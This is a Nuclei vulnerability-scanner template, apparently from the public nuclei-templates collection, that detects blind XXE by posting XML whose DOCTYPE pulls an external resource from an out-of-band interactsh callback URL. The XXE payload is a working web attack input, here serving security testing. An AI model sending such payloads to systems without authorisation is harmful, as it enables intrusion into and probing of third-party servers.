nuclei-templates/vulnerabilities/generic/generic-blind-xxe.yaml

26 lines
521 B
YAML

id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
tags: xxe,generic,blind
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: {{BaseURL}}
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
<foo>&e1;</foo>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"